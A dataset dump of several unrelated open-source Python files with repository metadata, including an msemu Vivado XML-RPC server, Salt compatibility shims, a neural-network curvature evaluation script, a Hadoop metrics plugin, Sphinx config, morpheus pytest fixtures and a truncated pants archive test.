2020-03-19T20:58:12.000Z
|
2020-07-08T09:20:41.000Z
|
msemu/server.py
|
sgherbst/msemu
|
a99f1380c707d34ddc4554b09db50c6d24605838
|
[
"MIT"
] | null | null | null |
msemu/server.py
|
sgherbst/msemu
|
a99f1380c707d34ddc4554b09db50c6d24605838
|
[
"MIT"
] | 1
|
2021-12-27T19:23:40.000Z
|
2021-12-27T19:23:40.000Z
|
SERVER_PORT = 57937
def get_client():
import xmlrpc.client
return xmlrpc.client.ServerProxy(f'http://localhost:{SERVER_PORT}')
def main():
# modified from https://docs.python.org/3.7/library/xmlrpc.server.html?highlight=xmlrpc
print('Launching Vivado TCL server...')
import pexpect
from xmlrpc.server import SimpleXMLRPCServer
from xmlrpc.server import SimpleXMLRPCRequestHandler
# Restrict to a particular path.
class RequestHandler(SimpleXMLRPCRequestHandler):
rpc_paths = ('/RPC2',)
# Instantiate TCL evaluator
child = pexpect.spawnu('vivado -nolog -nojournal -notrace -mode tcl')
child.expect('Vivado% ')
# Create server
with SimpleXMLRPCServer(('localhost', SERVER_PORT),
requestHandler=RequestHandler,
allow_none=True) as server:
server.register_introspection_functions()
def sendline(line):
child.sendline(line)
child.expect('Vivado% ')
return child.before
def set_vio(name, value):
sendline(f'set_property OUTPUT_VALUE {value} ${name}')
sendline(f'commit_hw_vio ${name}')
def get_vio(name):
before = sendline(f'get_property INPUT_VALUE ${name}')
before = before.splitlines()[-1] # get last line
before = before.strip() # strip off whitespace
return before
def pulse_reset():
sendline('pulse_reset $rst')
def refresh_hw_vio(name):
sendline(f'refresh_hw_vio ${name}')
server.register_function(sendline)
server.register_function(set_vio)
server.register_function(get_vio)
server.register_function(pulse_reset)
server.register_function(refresh_hw_vio)
print(f'Server ready on port {SERVER_PORT}.')
server.serve_forever()
if __name__ == '__main__':
main()
| 31.688525
| 91
| 0.639421
|
81e2134eca351705f341558a006f2aa1493061eb
| 4,029
|
py
|
Python
|
salt/_compat.py
|
gotcha/salt
|
7b84c704777d3d2062911895dc3fdf93d40e9848
|
[
"Apache-2.0"
] | 1
|
2016-07-07T18:43:05.000Z
|
2016-07-07T18:43:05.000Z
|
salt/_compat.py
|
gotcha/salt
|
7b84c704777d3d2062911895dc3fdf93d40e9848
|
[
"Apache-2.0"
] | null | null | null |
salt/_compat.py
|
gotcha/salt
|
7b84c704777d3d2062911895dc3fdf93d40e9848
|
[
"Apache-2.0"
] | 1
|
2020-12-04T11:28:06.000Z
|
2020-12-04T11:28:06.000Z
|
'''
Salt compatibility code
'''
# Import python libs
import sys
import types
try:
import cPickle as pickle
except ImportError:
import pickle
# True if we are running on Python 3.
PY3 = sys.version_info[0] == 3
if PY3:
MAX_SIZE = sys.maxsize
else:
MAX_SIZE = sys.maxint
# pylint: disable-msg=C0103
if PY3:
string_types = str,
integer_types = int,
class_types = type,
text_type = str
binary_type = bytes
long = int
else:
string_types = basestring,
integer_types = (int, long)
class_types = (type, types.ClassType)
text_type = unicode
binary_type = str
long = long
if PY3:
def callable(obj):
return any('__call__' in klass.__dict__ for klass in type(obj).__mro__)
else:
callable = callable
def text_(s, encoding='latin-1', errors='strict'):
'''
If ``s`` is an instance of ``binary_type``, return
``s.decode(encoding, errors)``, otherwise return ``s``
'''
if isinstance(s, binary_type):
return s.decode(encoding, errors)
return s
def bytes_(s, encoding='latin-1', errors='strict'):
'''
If ``s`` is an instance of ``text_type``, return
``s.encode(encoding, errors)``, otherwise return ``s``
'''
if isinstance(s, text_type):
return s.encode(encoding, errors)
return s
if PY3:
def ascii_native_(s):
if isinstance(s, text_type):
s = s.encode('ascii')
return str(s, 'ascii', 'strict')
else:
def ascii_native_(s):
if isinstance(s, text_type):
s = s.encode('ascii')
return str(s)
ascii_native_.__doc__ = '''
Python 3: If ``s`` is an instance of ``text_type``, return
``s.encode('ascii')``, otherwise return ``str(s, 'ascii', 'strict')``
Python 2: If ``s`` is an instance of ``text_type``, return
``s.encode('ascii')``, otherwise return ``str(s)``
'''
if PY3:
def native_(s, encoding='latin-1', errors='strict'):
'''
If ``s`` is an instance of ``text_type``, return
``s``, otherwise return ``str(s, encoding, errors)``
'''
if isinstance(s, text_type):
return s
return str(s, encoding, errors)
else:
def native_(s, encoding='latin-1', errors='strict'):
'''
If ``s`` is an instance of ``text_type``, return
``s.encode(encoding, errors)``, otherwise return ``str(s)``
'''
if isinstance(s, text_type):
return s.encode(encoding, errors)
return str(s)
native_.__doc__ = '''
Python 3: If ``s`` is an instance of ``text_type``, return ``s``, otherwise
return ``str(s, encoding, errors)``
Python 2: If ``s`` is an instance of ``text_type``, return
``s.encode(encoding, errors)``, otherwise return ``str(s)``
'''
if PY3:
from urllib import parse
from urllib.error import URLError
import http.server as BaseHTTPServer
from urllib.error import HTTPError
urlparse = parse
from urllib.parse import quote as url_quote
from urllib.parse import quote_plus as url_quote_plus
from urllib.parse import unquote as url_unquote
from urllib.parse import urlencode as url_encode
from urllib.request import urlopen as url_open
url_unquote_text = url_unquote
url_unquote_native = url_unquote
else:
from urlparse import urlparse
import BaseHTTPServer
from urllib2 import HTTPError, URLError
from urllib import quote as url_quote
from urllib import quote_plus as url_quote_plus
from urllib import unquote as url_unquote
from urllib import urlencode as url_encode
from urllib2 import urlopen as url_open
def url_unquote_text(v, encoding='utf-8', errors='replace'):
v = url_unquote(v)
return v.decode(encoding, errors)
def url_unquote_native(v, encoding='utf-8', errors='replace'):
return native_(url_unquote_text(v, encoding, errors))
if PY3:
zip = zip
else:
from future_builtins import zip
if PY3:
from io import StringIO
else:
from StringIO import StringIO
# pylint: enable-msg=C0103
| 26.86
| 79
| 0.647059
|
02ad4e06ffe649fa4288ddd9b44762967115cb9a
| 8,095
|
py
|
Python
|
exp/exp13_full_batch_monitoring/eval.py
|
jbzrE7bp/vivit
|
69e45ed82265d1abe18acbc17507756f686884d9
|
[
"MIT"
] | null | null | null |
exp/exp13_full_batch_monitoring/eval.py
|
jbzrE7bp/vivit
|
69e45ed82265d1abe18acbc17507756f686884d9
|
[
"MIT"
] | null | null | null |
exp/exp13_full_batch_monitoring/eval.py
|
jbzrE7bp/vivit
|
69e45ed82265d1abe18acbc17507756f686884d9
|
[
"MIT"
] | null | null | null |
"""This script performs the evaluation for the configuration and checkpoint specified
by the two command line arguments `config_str` and `checkpoint`. An example call looks
like this: `python ./eval.py --config_str cifar10_resnet32_sgd --checkpoint 0 0`.
The evaluation includes the following computations:
1) full-batch gradient
2) top-C eigenvectors of the full-batch GGN
3) top-C eigenvectors of the full-batch Hessian
NOTE: All computed quantities for one particular configuration and one particular
checkpoint are stored in the same folder determined by `get_eval_savedir`.
"""
import argparse
import os
from warnings import warn
import dill
import torch
from config import CHECKPOINTS_OUTPUT, config_str_to_config
from run_eval import get_eval_savedir
from scipy.sparse.linalg import eigsh
from torch.utils.data import DataLoader, TensorDataset
from exp.utils.deepobs import get_deterministic_deepobs_train_loader
from exp.utils.deepobs_runner import CheckpointRunner
from vivit.hessianfree import GGNLinearOperator, HessianLinearOperator
USE_ONE_BATCH = False # For debugging: Dataloader only contains one batch
VERBOSE = True
CHECK_DETERMINISTIC = True
DEV = torch.device("cuda" if torch.cuda.is_available() else "cpu")
# ======================================================================================
# I/O: Utilities for loading checkpoints and saving results of the evaluation
# ======================================================================================
def load_checkpoint(problem_cls, optimizer_cls, checkpoint):
"""Load checkpointed model and loss function. Returns `None` if checkpoint is not
found.
"""
savepath = CheckpointRunner.get_checkpoint_savepath(
checkpoint, optimizer_cls, problem_cls, CHECKPOINTS_OUTPUT, extension=".pt"
)
print(f"Loading checkpoint from {savepath}")
try:
return torch.load(savepath, pickle_module=dill)
except OSError:
warn(f"Checkpoint {checkpoint} not found at {savepath}. Returning `None`.")
return None
def get_eval_savepath(
problem_cls, optimizer_cls, checkpoint, file_name, extension=".pt"
):
"""Get savepath for some result of the evaluation named `file_name`."""
savedir = get_eval_savedir(problem_cls, optimizer_cls, checkpoint)
return os.path.join(savedir, f"{file_name}{extension}")
def numpy_to_torch32(numpy_array):
"""Convert numpy array into torch float32 tensor"""
return (torch.from_numpy(numpy_array)).to(torch.float32)
# ======================================================================================
# Evaluation
# ======================================================================================
def eval_Hessian(model, loss_func, dataloader, num_classes, savepath):
"""Evaluate and store top-C eigenspace of the Hessian"""
if VERBOSE:
print(f"\neval_Hessian: Storing results at {savepath}")
if os.path.exists(savepath):
print(f"File {savepath} already exists. Skipping computation.")
else:
H = HessianLinearOperator(
model,
loss_func,
dataloader,
DEV,
progressbar=False,
check_deterministic=CHECK_DETERMINISTIC,
)
H_evals, H_evecs = eigsh(H, k=num_classes, which="LM")
H_results = {
"H_evals": numpy_to_torch32(H_evals),
"H_evecs": numpy_to_torch32(H_evecs),
}
torch.save(H_results, savepath)
def eval_GGN(model, loss_func, dataloader, num_classes, savepath):
"""Evaluate and store top-C eigenspace of the GGN"""
if VERBOSE:
print(f"\neval_GGN: Storing results at {savepath}")
if os.path.exists(savepath):
print(f"File {savepath} already exists. Skipping computation.")
else:
G = GGNLinearOperator(
model,
loss_func,
dataloader,
DEV,
progressbar=False,
check_deterministic=CHECK_DETERMINISTIC,
)
G_evals, G_evecs = eigsh(G, k=num_classes, which="LM")
G_results = {
"G_evals": numpy_to_torch32(G_evals),
"G_evecs": numpy_to_torch32(G_evecs),
}
torch.save(G_results, savepath)
def eval_gradient(model, loss_func, dataloader, savepath):
"""Evaluate and store gradient"""
if VERBOSE:
print(f"\neval_gradient: Storing results at {savepath}")
if os.path.exists(savepath):
print(f"File {savepath} already exists. Skipping computation.")
else:
H = HessianLinearOperator(
model,
loss_func,
dataloader,
DEV,
progressbar=False,
check_deterministic=CHECK_DETERMINISTIC,
)
grad, _ = H.gradient_and_loss()
grad = (torch.nn.utils.parameters_to_vector(grad)).to(torch.float32)
torch.save(grad, savepath)
def eval_checkpoint(config, checkpoint):
"""Perform all computations"""
if VERBOSE:
print("\n===== eval_checkpoint =====")
print("\nconfig = \n", config)
print("\ncheckpoint = ", checkpoint)
print("\nDEV = ", DEV, "\n")
problem_cls = config["problem_cls"]
optimizer_cls = config["optimizer_cls"]
eval_batchsize = config["batch_size"]
num_classes = config["num_classes"]
# Load checkpoint data, skip evaluation if checkpoint is not found
checkpoint_data = load_checkpoint(problem_cls, optimizer_cls, checkpoint)
if checkpoint_data is None:
warn("No checkpoint data was found. Skipping computations.")
return
# Preparations
model = checkpoint_data.pop("model")
model.eval() # Required by ResNet (BN layers)
loss_func = checkpoint_data.pop("loss_func")
torch.manual_seed(0) # deterministic split into training/validation set
dataloader = get_deterministic_deepobs_train_loader(problem_cls, eval_batchsize)
# For debugging: Modify the dataloader such that it contains only the first batch
if USE_ONE_BATCH:
print("Warning: `eval_checkpoint` uses only the first batch of the dataloader")
input, labels = next(iter(dataloader))
dataset = TensorDataset(input, labels)
dataloader = DataLoader(dataset, batch_size=len(labels))
if not CHECK_DETERMINISTIC:
warn("Deterministic behaviour of linear operators is not checked")
# Hessian
file_name = "topC_fb_Hessian"
savepath = get_eval_savepath(problem_cls, optimizer_cls, checkpoint, file_name)
eval_Hessian(model, loss_func, dataloader, num_classes, savepath)
# GGN
file_name = "topC_fb_GGN"
savepath = get_eval_savepath(problem_cls, optimizer_cls, checkpoint, file_name)
eval_GGN(model, loss_func, dataloader, num_classes, savepath)
# Gradient
file_name = "fb_gradient"
savepath = get_eval_savepath(problem_cls, optimizer_cls, checkpoint, file_name)
eval_gradient(model, loss_func, dataloader, savepath)
# ======================================================================================
# Parser for the two command line arguments `config_str` and `checkpoint`
# ======================================================================================
def get_args_parser():
"""Create a parser for the command line arguments."""
parser_description = "Parse ``config_str`` and ``checkpoint``."
parser = argparse.ArgumentParser(description=parser_description)
parser.add_argument(
"--config_str",
dest="config_str",
action="store",
type=str,
help="The configuration as a string",
)
parser.add_argument(
"--checkpoint",
nargs=2,
dest="checkpoint",
action="store",
type=int,
help="The checkpoint (a tuple)",
)
return parser
if __name__ == "__main__":
# Parse command line arguments
parser = get_args_parser()
args = parser.parse_args()
config = config_str_to_config(args.config_str)
checkpoint = tuple(args.checkpoint)
# Evaluate checkpoint
eval_checkpoint(config, checkpoint)
| 35.04329
| 88
| 0.643854
|
b883fb7445a0299e878f0b6403af3db3196813a3
| 1,559
|
py
|
Python
|
hadoop_resourcemanager_metrics/hadoop_resourcemanager_metrics.py
|
sasank1/plugins
|
f12dcb207dcd53819f2f23eeaab3b60a40885d4b
|
[
"BSD-2-Clause"
] | 1
|
2019-12-10T06:44:19.000Z
|
2019-12-10T06:44:19.000Z
|
hadoop_resourcemanager_metrics/hadoop_resourcemanager_metrics.py
|
sasank1/plugins
|
f12dcb207dcd53819f2f23eeaab3b60a40885d4b
|
[
"BSD-2-Clause"
] | null | null | null |
hadoop_resourcemanager_metrics/hadoop_resourcemanager_metrics.py
|
sasank1/plugins
|
f12dcb207dcd53819f2f23eeaab3b60a40885d4b
|
[
"BSD-2-Clause"
] | null | null | null |
#!/usr/bin/python3
### Author: Vinoth Manoharan, Zoho Corp
### Language : Python
### Tested in Ubuntu
import urllib.request, json
# if any impacting changes to this plugin kindly increment the plugin
# version here.
PLUGIN_VERSION = "1"
# Setting this to true will alert you when there is a communication
# problem while posting plugin data to server
HEARTBEAT = "true"
# Config Section:
HADOOP_HOST = "localhost"
HADOOP_PORT = "8088"
METRICS_UNITS = {'allocatedMB': 'MB',
'totalMB': 'MB',
'availableMB': 'MB',
'appsSubmitted':'Units',
'appsCompleted':'Units',
'appsPending':'Units',
'totalVirtualCores': 'Units',
'allocatedVirtualCores': 'Units',
'availableVirtualCores': 'Units',
'totalNodes': 'Units',
}
class ResourceManager:
def __init__(self, hostName="localhost", port="8088"):
self.url = 'http://%s:%s/ws/v1/cluster/metrics' % (hostName, port)
self.req = urllib.request.Request(self.url)
def metricCollector(self):
data = {}
with urllib.request.urlopen(self.req) as res:
result = json.loads(res.read().decode())
result = result["clusterMetrics"]
result['units'] = METRICS_UNITS
return result
if __name__ == "__main__":
r = ResourceManager(hostName=HADOOP_HOST, port=HADOOP_PORT)
result = r.metricCollector()
print(json.dumps(result, indent=4, sort_keys=True))
| 28.87037
| 74
| 0.600385
|
8e317bdeab1950aed4b0adb3bc24fe5adf4f1412
| 1,423
|
py
|
Python
|
streamlit_app.py
|
drprajapati/streamlit-deolidfy
|
05f644c012c05df8d84e89ffae10714885182022
|
[
"MIT"
] | 1
|
2021-07-26T04:12:03.000Z
|
2021-07-26T04:12:03.000Z
|
streamlit_app.py
|
drprajapati/streamlit-deolidfy
|
05f644c012c05df8d84e89ffae10714885182022
|
[
"MIT"
] | null | null | null |
streamlit_app.py
|
drprajapati/streamlit-deolidfy
|
05f644c012c05df8d84e89ffae10714885182022
|
[
"MIT"
] | 1
|
2021-05-24T06:42:30.000Z
|
2021-05-24T06:42:30.000Z
|
import uuid
from deoldify.visualize import *
from app_utils import download
from app_utils import generate_random_filename
from app_utils import clean_me
from app_utils import clean_all
from app_utils import create_directory
from app_utils import get_model_bin
from app_utils import convertToJPG
import fastai
import torch
import streamlit as st
ALLOWED_EXTENSIONS = set(['png', 'jpg', 'jpeg', 'gif'])
image_colorizer = get_image_colorizer(root_folder=Path('/app/streamlit-deolidfy/deoldify/'), artistic=True)
print(image_colorizer)
if torch.cuda.is_available():
torch.backends.cudnn.benchmark = True
os.environ["CUDA_VISIBLE_DEVICES"] = "0"
else:
del os.environ["CUDA_VISIBLE_DEVICES"]
def process_image(input_path):
render_factor = 30
result = image_colorizer.plot_transformed_image(path='test_images/' + input_path, figsize=(20,20), render_factor=int(render_factor), display_render_factor=True, compare=False)
return result
if __name__ == '__main__':
uploaded_file = st.file_uploader("Choose an image for Improvisation...", type="jpg")
if uploaded_file is not None:
image = Image.open(uploaded_file)
image.save('test_images/' + str(uploaded_file.name))
st.image(image, caption='Uploaded Image.', use_column_width=True)
image_colorizer = get_image_colorizer(artistic=True)
results = process_image(uploaded_file.name)
st.image(results)
| 34.707317
| 179
| 0.762474
|
7ab024b8bf8a278f9e79ccbce7f7879c9371c0ce
| 49
|
py
|
Python
|
test/output/031.py
|
EliRibble/pyfmt
|
e84a5531a7c06703eddd9dbc2072b0c8deae8c57
|
[
"MIT"
] | null | null | null |
test/output/031.py
|
EliRibble/pyfmt
|
e84a5531a7c06703eddd9dbc2072b0c8deae8c57
|
[
"MIT"
] | null | null | null |
test/output/031.py
|
EliRibble/pyfmt
|
e84a5531a7c06703eddd9dbc2072b0c8deae8c57
|
[
"MIT"
] | null | null | null |
class Foo():
def __init__(self):
self.bar = 0
| 12.25
| 20
| 0.632653
|
ab384369df092236be9c84869834cdca9708c544
| 3,285
|
py
|
Python
|
docs/conf.py
|
gregjhogan/openpilo
|
9d753eb29c4a106f78db23f693cd788f8f861cc8
|
[
"MIT"
] | 37,508
|
2016-11-30T18:18:49.000Z
|
2022-03-31T23:52:00.000Z
|
docs/conf.py
|
gregjhogan/openpilo
|
9d753eb29c4a106f78db23f693cd788f8f861cc8
|
[
"MIT"
] | 3,719
|
2016-11-30T19:25:03.000Z
|
2022-03-31T22:03:56.000Z
|
docs/conf.py
|
gregjhogan/openpilo
|
9d753eb29c4a106f78db23f693cd788f8f861cc8
|
[
"MIT"
] | 7,859
|
2016-11-30T19:03:05.000Z
|
2022-03-31T22:56:37.000Z
|
# type: ignore
# pylint: skip-file
# Configuration file for the Sphinx documentation builder.
#
# This file only contains a selection of the most common options. For a full
# list see the documentation:
# https://www.sphinx-doc.org/en/master/usage/configuration.html
# -- Path setup --------------------------------------------------------------
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import os
import sys
sys.path.insert(0, os.path.abspath('.'))
sys.path.insert(0, os.path.abspath('..'))
# -- Project information -----------------------------------------------------
project = 'openpilot'
copyright = '2021, comma.ai'
author = 'comma.ai'
language = 'en'
# -- General configuration ---------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc', # Auto-generate docs
'sphinx.ext.viewcode', # Add view code link to modules
'sphinx_rtd_theme', # Read The Docs theme
'myst_parser', # Markdown parsing
'sphinx_sitemap', # sitemap generation for SEO
]
myst_html_meta = {
"description": "openpilot docs",
"keywords": "op, openpilot, docs, documentation",
"robots": "all,follow",
"googlebot": "index,follow,snippet,archive",
"property=og:locale": "en_US",
"property=og:site_name": "docs.comma.ai",
"property=og:url": "https://docs.comma.ai",
"property=og:title": "openpilot Docuemntation",
"property=og:type": "website",
"property=og:image:type": "image/jpeg",
"property=og:image:width": "400",
"property=og:image": "https://docs.comma.ai/_static/logo.png",
"property=og:image:url": "https://docs.comma.ai/_static/logo.png",
"property=og:image:secure_url": "https://docs.comma.ai/_static/logo.png",
"property=og:description": "openpilot Documentation",
"property=twitter:card": "summary_large_image",
"property=twitter:logo": "https://docs.comma.ai/_static/logo.png",
"property=twitter:title": "openpilot Documentation",
"property=twitter:description": "openpilot Documentation"
}
html_baseurl = 'https://docs.comma.ai/'
sitemap_filename = "sitemap.xml"
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path.
exclude_patterns = []
# -- Options for HTML output -------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'sphinx_rtd_theme'
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
html_extra_path = ['_static']
| 36.5
| 79
| 0.666971
|
727f898028275f4be5d5335c22552bfc88bfd1cd
| 2,003
|
py
|
Python
|
atom/event.py
|
Tillsten/atom
|
19b6291f7d3c9b3828dcd73e900b8dcbc2ddf92d
|
[
"BSD-3-Clause-Clear"
] | null | null | null |
atom/event.py
|
Tillsten/atom
|
19b6291f7d3c9b3828dcd73e900b8dcbc2ddf92d
|
[
"BSD-3-Clause-Clear"
] | null | null | null |
atom/event.py
|
Tillsten/atom
|
19b6291f7d3c9b3828dcd73e900b8dcbc2ddf92d
|
[
"BSD-3-Clause-Clear"
] | null | null | null |
#------------------------------------------------------------------------------
# Copyright (c) 2013-2017, Nucleic Development Team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file LICENSE, distributed with this software.
#------------------------------------------------------------------------------
from .catom import Member, Validate, GetAttr, SetAttr, DelAttr
class Event(Member):
""" A member which acts like a stateless event.
"""
__slots__ = ()
def __init__(self, kind=None):
""" Initialize an Event.
Parameters
----------
kind : type or Member, optional
The type of argument which may be emitted by the event or
a Member which will validate the argument which can be
emitted. The default is None and indicates no validation
will be performed.
"""
self.set_getattr_mode(GetAttr.Event, None)
self.set_setattr_mode(SetAttr.Event, None)
self.set_delattr_mode(DelAttr.Event, None)
if kind is not None:
if isinstance(kind, Member):
self.set_validate_mode(Validate.Delegate, kind)
else:
self.set_validate_mode(Validate.Instance, kind)
def set_name(self, name):
""" A reimplemented parent class method.
This method ensures that the delegate name is also set, if a
delegate validator is being used.
"""
super(Event, self).set_name(name)
mode, kind = self.validate_mode
if isinstance(kind, Member):
kind.set_name(name)
def set_index(self, index):
""" A reimplemented parent class method.
This method ensures that the delegate index is also set, if a
delegate validator is being used.
"""
super(Event, self).set_index(index)
mode, kind = self.validate_mode
if isinstance(kind, Member):
kind.set_index(index)
| 32.836066
| 79
| 0.574638
|
17fb802e395f33ebeddf9212b8bedb630a02e608
| 6,750
|
py
|
Python
|
tests/conftest.py
|
alextford11/morpheus
|
74cd3482e06b66316847587dcdd124ac989f809d
|
[
"MIT"
] | null | null | null |
tests/conftest.py
|
alextford11/morpheus
|
74cd3482e06b66316847587dcdd124ac989f809d
|
[
"MIT"
] | null | null | null |
tests/conftest.py
|
alextford11/morpheus
|
74cd3482e06b66316847587dcdd124ac989f809d
|
[
"MIT"
] | null | null | null |
import asyncio
import pytest
import re
import uuid
from aiohttp.test_utils import teardown_test_loop
from aioredis import create_redis
from arq import ArqRedis, Worker
from atoolbox.db import prepare_database
from atoolbox.db.helpers import DummyPgPool
from atoolbox.test_utils import DummyServer, create_dummy_server
from buildpg import Values, asyncpg
from morpheus.app.main import create_app
from morpheus.app.models import EmailSendModel, SendMethod
from morpheus.app.settings import Settings
from morpheus.app.views import get_create_company_id
from morpheus.app.worker import startup as worker_startup, worker_functions
from . import dummy_server
def pytest_addoption(parser):
parser.addoption('--reuse-db', action='store_true', default=False, help='keep the existing database if it exists')
pg_settings = dict(pg_dsn='postgres://postgres:waffle@localhost:5432/morpheus_test')
@pytest.fixture(scope='session', name='clean_db')
def _fix_clean_db(request):
# loop fixture has function scope so can't be used here.
settings = Settings(**pg_settings)
loop = asyncio.new_event_loop()
loop.run_until_complete(prepare_database(settings, not request.config.getoption('--reuse-db')))
teardown_test_loop(loop)
@pytest.fixture(name='db_conn')
async def _fix_db_conn(loop, settings, clean_db):
conn = await asyncpg.connect_b(dsn=settings.pg_dsn, loop=loop)
tr = conn.transaction()
await tr.start()
await conn.execute("set client_min_messages = 'log'")
yield conn
await tr.rollback()
await conn.close()
@pytest.yield_fixture
async def redis(loop, settings):
addr = settings.redis_settings.host, settings.redis_settings.port
redis = await create_redis(addr, db=settings.redis_settings.database, encoding='utf8', commands_factory=ArqRedis)
await redis.flushdb()
yield redis
redis.close()
await redis.wait_closed()
@pytest.fixture(name='dummy_server')
async def _fix_dummy_server(aiohttp_server):
ctx = {'mandrill_subaccounts': {}}
return await create_dummy_server(aiohttp_server, extra_routes=dummy_server.routes, extra_context=ctx)
@pytest.fixture
def settings(tmpdir, dummy_server: DummyServer):
return Settings(
**pg_settings,
auth_key='testing-key',
test_output=str(tmpdir),
pdf_generation_url=dummy_server.server_name + '/generate.pdf',
mandrill_key='good-mandrill-testing-key',
log_level='ERROR',
mandrill_url=dummy_server.server_name + '/mandrill',
mandrill_timeout=0.5,
host_name=None,
click_host_name='click.example.com',
messagebird_key='good-messagebird-testing-key',
messagebird_url=dummy_server.server_name + '/messagebird',
messagebird_pricing_api=dummy_server.server_name + '/messagebird-pricing',
messagebird_pricing_username='mb-username',
messagebird_pricing_password='mb-password',
stats_token='test-token',
max_request_stats=10,
)
@pytest.fixture(name='cli')
async def _fix_cli(loop, test_client, settings, db_conn, redis):
async def pre_startup(app):
app.update(redis=redis, pg=DummyPgPool(db_conn))
app = create_app(settings=settings)
app.update(pg=DummyPgPool(db_conn), webhook_auth_key=b'testing')
app.on_startup.insert(0, pre_startup)
cli = await test_client(app)
cli.server.app['morpheus_api'].root = f'http://localhost:{cli.server.port}/'
return cli
@pytest.fixture
def send_email(cli, worker):
async def _send_message(status_code=201, **extra):
data = dict(
uid=str(uuid.uuid4()),
main_template='<body>\n{{{ message }}}\n</body>',
company_code='foobar',
from_address='Sender Name <sender@example.com>',
method='email-test',
subject_template='test message',
context={'message': 'this is a test'},
recipients=[{'address': 'foobar@testing.com'}],
)
# assert all(e in data for e in extra), f'{extra.keys()} fields not in {data.keys()}'
data.update(**extra)
r = await cli.post('/send/email/', json=data, headers={'Authorization': 'testing-key'})
assert r.status == status_code
await worker.run_check()
if len(data['recipients']) != 1:
return NotImplemented
else:
return re.sub(r'[^a-zA-Z0-9\-]', '', f'{data["uid"]}-{data["recipients"][0]["address"]}')
return _send_message
@pytest.fixture
def send_sms(cli, worker):
async def _send_message(**extra):
data = dict(
uid=str(uuid.uuid4()),
main_template='this is a test {{ variable }}',
company_code='foobar',
from_name='FooBar',
method='sms-test',
context={'variable': 'apples'},
recipients=[{'number': '07896541236'}],
)
# assert all(e in data for e in extra), f'{extra.keys()} fields not in {data.keys()}'
data.update(**extra)
r = await cli.post('/send/sms/', json=data, headers={'Authorization': 'testing-key'})
assert r.status == 201
await worker.run_check()
return data['uid'] + '-447896541236'
return _send_message
@pytest.yield_fixture(name='worker_ctx')
async def _fix_worker_ctx(settings, db_conn):
ctx = dict(settings=settings, pg=DummyPgPool(db_conn))
await worker_startup(ctx)
yield ctx
await asyncio.gather(ctx['session'].close(), ctx['mandrill'].close(), ctx['messagebird'].close())
@pytest.yield_fixture(name='worker')
async def _fix_worker(cli, worker_ctx):
worker = Worker(
functions=worker_functions, redis_pool=cli.server.app['redis'], burst=True, poll_delay=0.01, ctx=worker_ctx
)
yield worker
await worker.close()
@pytest.fixture(name='call_send_emails')
def _fix_call_send_emails(db_conn):
async def run(**kwargs):
base_kwargs = dict(
uid=str(uuid.uuid4()),
subject_template='hello',
company_code='test',
from_address='testing@example.com',
method=SendMethod.email_mandrill,
recipients=[],
)
m = EmailSendModel(**dict(base_kwargs, **kwargs))
company_id = await get_create_company_id(db_conn, m.company_code)
group_id = await db_conn.fetchval_b(
'insert into message_groups (:values__names) values :values returning id',
values=Values(
uuid=m.uid,
company_id=company_id,
message_method=m.method.value,
from_email=m.from_address.email,
from_name=m.from_address.name,
),
)
return group_id, company_id, m
return run
| 33.415842
| 118
| 0.668741
|
6dcf71ca6f4aa56b617d6b6305be37dec4959b5a
| 5,553
|
py
|
Python
|
src/python/pants/core/util_rules/archive_test.py
|
yoav-orca/pants
|
995448e9add343975844c7a43d5d64618fc4e4d9
|
[
"Apache-2.0"
] | 1,806
|
2015-01-05T07:31:00.000Z
|
2022-03-31T11:35:41.000Z
|
src/python/pants/core/util_rules/archive_test.py
|
yoav-orca/pants
|
995448e9add343975844c7a43d5d64618fc4e4d9
|
[
"Apache-2.0"
] | 9,565
|
2015-01-02T19:01:59.000Z
|
2022-03-31T23:25:16.000Z
|
src/python/pants/core/util_rules/archive_test.py
|
ryanking/pants
|
e45b00d2eb467b599966bca262405a5d74d27bdd
|
[
"Apache-2.0"
] | 443
|
2015-01-06T20:17:57.000Z
|
2022-03-31T05:28:17.000Z
|
# Copyright 2020 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
import gzip
import tarfile
import zipfile
from io import BytesIO
import pytest
from pants.core.util_rules.archive import ArchiveFormat, CreateArchive, ExtractedArchive
from pants.core.util_rules.archive import rules as archive_rules
from pants.engine.fs import Digest, DigestContents, FileContent
from pants.testutil.rule_runner import QueryRule, RuleRunner
@pytest.fixture
def rule_runner() -> RuleRunner:
return RuleRunner(
rules=[
*archive_rules(),
QueryRule(Digest, [CreateArchive]),
QueryRule(ExtractedArchive, [Digest]),
],
)
FILES = {"foo": b"bar", "hello/world": b"Hello, World!"}
EXPECTED_DIGEST_CONTENTS = DigestContents(
[FileContent(name, content) for name, content in FILES.items()]
)
@pytest.mark.parametrize("compression", [zipfile.ZIP_STORED, zipfile.ZIP_DEFLATED])
def test_extract_zip(rule_runner: RuleRunner, compression: int) -> None:
io = BytesIO()
with zipfile.ZipFile(io, "w", compression=compression) as zf:
for name, content in FILES.items():
zf.writestr(name, content)
io.flush()
input_snapshot = rule_runner.make_snapshot({"test.zip": io.getvalue()})
extracted_archive = rule_runner.request(ExtractedArchive, [input_snapshot.digest])
digest_contents = rule_runner.request(DigestContents, [extracted_archive.digest])
assert digest_contents == EXPECTED_DIGEST_CONTENTS
@pytest.mark.parametrize("compression", ["", "gz", "bz2", "xz"])
def test_extract_tar(rule_runner: RuleRunner, compression: str) -> None:
io = BytesIO()
mode = f"w:{compression}" if compression else "w"
with tarfile.open(mode=mode, fileobj=io) as tf:
for name, content in FILES.items():
tarinfo = tarfile.TarInfo(name)
tarinfo.size = len(content)
tf.addfile(tarinfo, BytesIO(content))
ext = f"tar.{compression}" if compression else "tar"
input_snapshot = rule_runner.make_snapshot({f"test.{ext}": io.getvalue()})
extracted_archive = rule_runner.request(ExtractedArchive, [input_snapshot.digest])
